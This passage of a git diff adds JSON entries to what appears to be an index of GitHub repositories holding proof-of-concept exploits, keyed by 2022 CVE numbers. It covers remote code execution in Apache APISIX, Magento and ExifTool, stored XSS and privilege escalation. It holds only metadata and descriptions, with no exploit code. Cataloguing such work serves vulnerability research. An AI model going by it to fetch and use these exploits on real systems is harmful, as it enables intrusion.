"CVE-2022-23773-repro", + "full_name": "danbudris\/CVE-2022-23773-repro", + "owner": { + "login": "danbudris", + "id": 11739241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11739241?v=4", + "html_url": "https:\/\/github.com\/danbudris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danbudris\/CVE-2022-23773-repro", + "description": "PoC repro of CVE-2022-23773 in Go", + "fork": false, + "created_at": "2022-09-16T16:28:35Z", + "updated_at": "2022-09-17T07:31:56Z", + "pushed_at": "2022-09-16T16:28:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 537537002, + "name": "CVE-2022-23773-repro-target", + "full_name": "danbudris\/CVE-2022-23773-repro-target", + "owner": { + "login": "danbudris", + "id": 11739241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11739241?v=4", + "html_url": "https:\/\/github.com\/danbudris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danbudris\/CVE-2022-23773-repro-target", + "description": null, + "fork": false, + "created_at": "2022-09-16T16:30:29Z", + "updated_at": "2022-09-16T16:34:02Z", + "pushed_at": "2022-09-16T17:36:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 615996454, + "name": "CVE-2022-23773-Reproduce", + "full_name": "YouShengLiu\/CVE-2022-23773-Reproduce", + "owner": { + "login": "YouShengLiu", + "id": 51371214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51371214?v=4", + "html_url": "https:\/\/github.com\/YouShengLiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YouShengLiu\/CVE-2022-23773-Reproduce", + "description": null, + "fork": false, + "created_at": "2023-03-19T10:08:47Z", + "updated_at": "2023-05-31T07:52:38Z", + "pushed_at": "2023-05-31T07:56:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23779.json b/2022/CVE-2022-23779.json new file mode 100644 index 0000000000..43a45c7e91 --- /dev/null +++ b/2022/CVE-2022-23779.json @@ -0,0 +1,64 @@ +[ + { + "id": 466566861, + "name": "CVE-2022-23779", + "full_name": "fbusr\/CVE-2022-23779", + "owner": { + "login": "fbusr", + "id": 98055920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98055920?v=4", + "html_url": "https:\/\/github.com\/fbusr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fbusr\/CVE-2022-23779", + "description": "CVE-2022-23779: Internal Hostname Disclosure Vulnerability", + "fork": false, + "created_at": "2022-03-05T21:01:13Z", + "updated_at": "2022-08-03T10:41:30Z", + "pushed_at": "2022-03-05T21:06:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 528322730, + "name": "Zoho_CVE-2022-23779", + "full_name": "Vulnmachines\/Zoho_CVE-2022-23779", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Zoho_CVE-2022-23779", + "description": "Internal Hostname Disclosure Vulnerability", + "fork": false, + "created_at": "2022-08-24T07:58:45Z", + "updated_at": "2024-08-12T20:26:27Z", + "pushed_at": "2022-09-02T20:06:06Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23812.json b/2022/CVE-2022-23812.json new file mode 100644 index 0000000000..38a92e021a --- /dev/null +++ b/2022/CVE-2022-23812.json @@ -0,0 +1,33 @@ +[ + { + "id": 471066063, + "name": "node-ipc-malware-protestware-CVE-2022-23812", + "full_name": "scriptzteam\/node-ipc-malware-protestware-CVE-2022-23812", + "owner": { + "login": "scriptzteam", + "id": 533180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/533180?v=4", + "html_url": "https:\/\/github.com\/scriptzteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scriptzteam\/node-ipc-malware-protestware-CVE-2022-23812", + "description": "node-ipc is malware \/ protestware!", + "fork": false, + "created_at": "2022-03-17T16:49:22Z", + "updated_at": "2022-03-18T04:02:06Z", + "pushed_at": "2022-03-17T16:49:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23861.json b/2022/CVE-2022-23861.json new file mode 100644 index 0000000000..5a2be4271c --- /dev/null +++ b/2022/CVE-2022-23861.json @@ -0,0 +1,40 @@ +[ + { + "id": 864892843, + "name": "CVE-2022-23861", + "full_name": "mbadanoiu\/CVE-2022-23861", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-23861", + "description": "CVE-2022-23861: Multiple Stored Cross-Site Scripting in YSoft SafeQ", + "fork": false, + "created_at": "2024-09-29T12:57:38Z", + "updated_at": "2024-09-29T13:19:14Z", + "pushed_at": "2024-09-29T13:13:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2022-23861", + "cves", + "xss" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23862.json b/2022/CVE-2022-23862.json new file mode 100644 index 0000000000..2dfb929190 --- /dev/null +++ b/2022/CVE-2022-23862.json @@ -0,0 +1,39 @@ +[ + { + "id": 864901218, + "name": "CVE-2022-23862", + "full_name": "mbadanoiu\/CVE-2022-23862", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-23862", + "description": "CVE-2022-23862: Local Privilege Escalation via Unauthenticated JMX in YSoft SafeQ", + "fork": false, + "created_at": "2024-09-29T13:24:40Z", + "updated_at": "2024-09-29T13:40:39Z", + "pushed_at": "2024-09-29T13:36:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-23862", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23884.json b/2022/CVE-2022-23884.json new file mode 100644 index 0000000000..3d61dcc70b --- /dev/null +++ b/2022/CVE-2022-23884.json @@ -0,0 +1,33 @@ +[ + { + "id": 475831213, + "name": "CVE-2022-23884", + "full_name": "nanaao\/CVE-2022-23884", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-23884", + "description": "Details,PoC and patches for CVE-2022-23884", + "fork": false, + "created_at": "2022-03-30T10:36:59Z", + "updated_at": "2023-11-17T11:57:33Z", + "pushed_at": "2022-03-30T10:36:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23935.json b/2022/CVE-2022-23935.json new file mode 100644 index 0000000000..4404ddff24 --- /dev/null +++ b/2022/CVE-2022-23935.json @@ -0,0 +1,131 @@ +[ + { + "id": 594491558, + "name": "CVE-2022-23935-PoC-Exploit", + "full_name": "dpbe32\/CVE-2022-23935-PoC-Exploit", + "owner": { + "login": "dpbe32", + "id": 93081177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93081177?v=4", + "html_url": "https:\/\/github.com\/dpbe32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpbe32\/CVE-2022-23935-PoC-Exploit", + "description": "CVE-2022-23935 exploit PoC exiftool version 12.37", + "fork": false, + "created_at": "2023-01-28T18:04:05Z", + "updated_at": "2024-05-31T07:39:02Z", + "pushed_at": "2023-02-21T15:22:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 598604286, + "name": "CVE-2022-23935", + "full_name": "cowsecurity\/CVE-2022-23935", + "owner": { + "login": "cowsecurity", + "id": 74612612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2022-23935", + "description": "CVE-2022-23935 exploit PoC exiftool version 12.37 written in python", + "fork": false, + "created_at": "2023-02-07T13:02:40Z", + "updated_at": "2024-10-22T14:32:35Z", + "pushed_at": "2023-02-07T13:10:30Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600164977, + "name": "CVE-2022-23935", + "full_name": "BKreisel\/CVE-2022-23935", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-23935", + "description": "🐍 Python Exploit for CVE-2022-23935", + "fork": false, + "created_at": "2023-02-10T18:22:44Z", + "updated_at": "2023-06-04T19:04:12Z", + "pushed_at": "2023-02-10T21:00:05Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-23935", + "exploit", + "python" + ], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 614902442, + "name": "CVE-2022-23935", + "full_name": "antisecc\/CVE-2022-23935", + "owner": { + "login": "antisecc", + "id": 92209707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4", + "html_url": "https:\/\/github.com\/antisecc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antisecc\/CVE-2022-23935", + "description": null, + "fork": false, + "created_at": "2023-03-16T14:47:55Z", + "updated_at": "2024-11-30T11:39:02Z", + "pushed_at": "2023-03-16T15:09:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23940.json b/2022/CVE-2022-23940.json new file mode 100644 index 0000000000..e8b851bccc --- /dev/null +++ b/2022/CVE-2022-23940.json @@ -0,0 +1,42 @@ +[ + { + "id": 466801862, + "name": "CVE-2022-23940", + "full_name": "manuelz120\/CVE-2022-23940", + "owner": { + "login": "manuelz120", + "id": 1948316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948316?v=4", + "html_url": "https:\/\/github.com\/manuelz120", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuelz120\/CVE-2022-23940", + "description": "PoC for CVE-2022-23940", + "fork": false, + "created_at": "2022-03-06T17:05:02Z", + "updated_at": "2024-11-20T06:29:49Z", + "pushed_at": "2022-03-11T06:38:16Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "insecure-deserialization", + "owasp-top-ten", + "python3", + "rce", + "remote-code-execution", + "security", + "suitecrm" + ], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23967.json b/2022/CVE-2022-23967.json new file mode 100644 index 0000000000..a25dbf878a --- /dev/null +++ b/2022/CVE-2022-23967.json @@ -0,0 +1,33 @@ +[ + { + "id": 452399615, + "name": "CVE-2022-23967", + "full_name": "MaherAzzouzi\/CVE-2022-23967", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-23967", + "description": "TightVNC Vulnerability.", + "fork": false, + "created_at": "2022-01-26T18:49:43Z", + "updated_at": "2023-04-05T13:06:51Z", + "pushed_at": "2022-01-26T18:53:03Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23988.json b/2022/CVE-2022-23988.json new file mode 100644 index 0000000000..a30d0e70af --- /dev/null +++ b/2022/CVE-2022-23988.json @@ -0,0 +1,33 @@ +[ + { + "id": 704136393, + "name": "WebSecurityProject", + "full_name": "simonepetruzzi\/WebSecurityProject", + "owner": { + "login": "simonepetruzzi", + "id": 62298351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62298351?v=4", + "html_url": "https:\/\/github.com\/simonepetruzzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simonepetruzzi\/WebSecurityProject", + "description": "Analysis and replication of CVE-2022-23988 and CVE-2022-34265 ", + "fork": false, + "created_at": "2023-10-12T15:58:06Z", + "updated_at": "2023-10-17T00:41:42Z", + "pushed_at": "2023-10-17T15:16:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24086.json b/2022/CVE-2022-24086.json index 0728dbb10f..7e46c144b6 100644 --- a/2022/CVE-2022-24086.json +++ b/2022/CVE-2022-24086.json @@ -30,6 +30,68 @@ "score": 0, "subscribers_count": 10 }, + { + "id": 464349314, + "name": "CVE-2022-24086-RCE", + "full_name": "nanaao\/CVE-2022-24086-RCE", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-24086-RCE", + "description": "CVE-2022-24086 RCE", + "fork": false, + "created_at": "2022-02-28T05:24:20Z", + "updated_at": "2024-08-12T20:21:04Z", + "pushed_at": "2022-02-26T10:29:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 470095423, + "name": "CVE-2022-24086-RCE", + "full_name": "NHPT\/CVE-2022-24086-RCE", + "owner": { + "login": "NHPT", + "id": 42366434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4", + "html_url": "https:\/\/github.com\/NHPT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NHPT\/CVE-2022-24086-RCE", + "description": null, + "fork": false, + "created_at": "2022-03-15T09:50:02Z", + "updated_at": "2024-08-12T20:21:34Z", + "pushed_at": "2022-03-15T05:15:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, { "id": 493876946, "name": "CVE-2022-24086-RCE-PoC", @@ -91,5 +153,140 @@ "watchers": 1, "score": 0, "subscribers_count": 1 + }, + { + "id": 544045744, + "name": "CVE-2022-24086", + "full_name": "akr3ch\/CVE-2022-24086", + "owner": { + "login": "akr3ch", + "id": 97300177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300177?v=4", + "html_url": "https:\/\/github.com\/akr3ch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akr3ch\/CVE-2022-24086", + "description": "PoC of CVE-2022-24086", + "fork": false, + "created_at": "2022-10-01T13:53:49Z", + "updated_at": "2024-08-12T20:27:28Z", + "pushed_at": "2022-10-01T13:54:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 580408900, + "name": "CVE-2022-24086", + "full_name": "pescepilota\/CVE-2022-24086", + "owner": { + "login": "pescepilota", + "id": 47446178, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47446178?v=4", + "html_url": "https:\/\/github.com\/pescepilota", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pescepilota\/CVE-2022-24086", + "description": "Proof of concept of CVE-2022-24086", + "fork": false, + "created_at": "2022-12-20T13:44:52Z", + "updated_at": "2024-08-12T20:28:57Z", + "pushed_at": "2022-12-20T15:10:18Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 686707778, + "name": "CVE-2022-24086", + "full_name": "BurpRoot\/CVE-2022-24086", + "owner": { + "login": "BurpRoot", + "id": 54332012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54332012?v=4", + "html_url": "https:\/\/github.com\/BurpRoot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurpRoot\/CVE-2022-24086", + "description": "CVE-2022-24086 POC example", + "fork": false, + "created_at": "2023-09-03T17:27:58Z", + "updated_at": "2023-09-03T17:27:58Z", + "pushed_at": "2023-09-03T17:34:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893761573, + "name": "magento2-template-filter-patch", + "full_name": "wubinworks\/magento2-template-filter-patch", + "owner": { + "login": "wubinworks", + "id": 127310257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127310257?v=4", + "html_url": "https:\/\/github.com\/wubinworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wubinworks\/magento2-template-filter-patch", + "description": "Magento 2 patch for CVE-2022-24086, CVE-2022-24087. Fix the RCE vulnerability and related bugs by performing deep template variable escaping. If you cannot upgrade Magento or cannot apply the official patches, try this one.", + "fork": false, + "created_at": "2024-11-25T06:56:05Z", + "updated_at": "2024-12-22T06:48:12Z", + "pushed_at": "2024-12-22T06:57:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "all-magento24-compatible", + "cve-2022-24086", + "cve-2022-24087", + "deep-escape", + "improper-input-validation", + "legacyresolver", + "magento2", + "patch", + "rce", + "template-filter" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-24112.json b/2022/CVE-2022-24112.json new file mode 100644 index 0000000000..a86e289eae --- /dev/null +++ b/2022/CVE-2022-24112.json @@ -0,0 +1,286 @@ +[ + { + "id": 462326409, + "name": "CVE-2022-24112", + "full_name": "Mr-xn\/CVE-2022-24112", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-24112", + "description": "CVE-2022-24112:Apache APISIX apisix\/batch-requests RCE", + "fork": false, + "created_at": "2022-02-22T14:09:49Z", + "updated_at": "2024-08-12T20:20:55Z", + "pushed_at": "2022-02-22T15:42:39Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 44, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 462508832, + "name": "CVE-2022-24112", + "full_name": "CrackerCat\/CVE-2022-24112", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2022-24112", + "description": "Apache APISIX apisix\/batch-requests RCE", + "fork": false, + "created_at": "2022-02-22T23:21:26Z", + "updated_at": "2022-02-22T20:31:08Z", + "pushed_at": "2022-02-22T19:05:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 463579186, + "name": "CVE-2022-24112", + "full_name": "Axx8\/CVE-2022-24112", + "owner": { + "login": "Axx8", + "id": 34683107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34683107?v=4", + "html_url": "https:\/\/github.com\/Axx8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axx8\/CVE-2022-24112", + "description": "Apache APISIX batch-requests RCE(CVE-2022-24112)", + "fork": false, + "created_at": "2022-02-25T15:17:28Z", + "updated_at": "2024-11-06T23:16:14Z", + "pushed_at": "2022-02-25T15:30:08Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467604662, + "name": "CVE-2022-24112", + "full_name": "Mah1ndra\/CVE-2022-24112", + "owner": { + "login": "Mah1ndra", + "id": 32550072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32550072?v=4", + "html_url": "https:\/\/github.com\/Mah1ndra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mah1ndra\/CVE-2022-24112", + "description": "CVE-2022-24112: Apache APISIX Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2022-03-08T17:08:52Z", + "updated_at": "2024-02-18T09:53:21Z", + "pushed_at": "2022-03-08T17:12:37Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470510353, + "name": "Apache-APISIX-CVE-2022-24112", + "full_name": "M4xSec\/Apache-APISIX-CVE-2022-24112", + "owner": { + "login": "M4xSec", + "id": 57313495, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57313495?v=4", + "html_url": "https:\/\/github.com\/M4xSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4xSec\/Apache-APISIX-CVE-2022-24112", + "description": "Apache APISIX Remote Code Execution (CVE-2022-24112) proof of concept exploit ", + "fork": false, + "created_at": "2022-03-16T09:19:12Z", + "updated_at": "2024-12-07T00:01:55Z", + "pushed_at": "2022-03-16T09:19:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 470905781, + "name": "CVE-2022-24112-POC", + "full_name": "kavishkagihan\/CVE-2022-24112-POC", + "owner": { + "login": "kavishkagihan", + "id": 85458014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85458014?v=4", + "html_url": "https:\/\/github.com\/kavishkagihan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kavishkagihan\/CVE-2022-24112-POC", + "description": "Apache APISIX 2.12.1 Remote Code Execution by IP restriction bypass and using default admin AIP token", + "fork": false, + "created_at": "2022-03-17T08:22:54Z", + "updated_at": "2023-07-18T07:35:54Z", + "pushed_at": "2022-03-17T08:24:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 472038804, + "name": "cve-2022-24112", + "full_name": "twseptian\/cve-2022-24112", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2022-24112", + "description": "Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab", + "fork": false, + "created_at": "2022-03-20T16:35:55Z", + "updated_at": "2024-12-19T13:32:51Z", + "pushed_at": "2022-03-20T18:09:34Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-apisix", + "cve-2022-24112", + "proof-of-concept", + "remote-code-execution" + ], + "visibility": "public", + "forks": 11, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 573818685, + "name": "CVE-2022-24112_POC", + "full_name": "Acczdy\/CVE-2022-24112_POC", + "owner": { + "login": "Acczdy", + "id": 107027804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107027804?v=4", + "html_url": "https:\/\/github.com\/Acczdy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Acczdy\/CVE-2022-24112_POC", + "description": "CVE-2022-24112_POC", + "fork": false, + "created_at": "2022-12-03T14:31:28Z", + "updated_at": "2023-11-01T00:54:12Z", + "pushed_at": "2022-12-04T03:12:17Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809913189, + "name": "exploit_CVE-2022-24112", + "full_name": "btar1gan\/exploit_CVE-2022-24112", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2022-24112", + "description": "New exploit for Apache APISIX v2.12.1 - Remote code execution (RCE)", + "fork": false, + "created_at": "2024-06-03T17:33:59Z", + "updated_at": "2024-09-15T17:20:39Z", + "pushed_at": "2024-06-07T05:09:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + 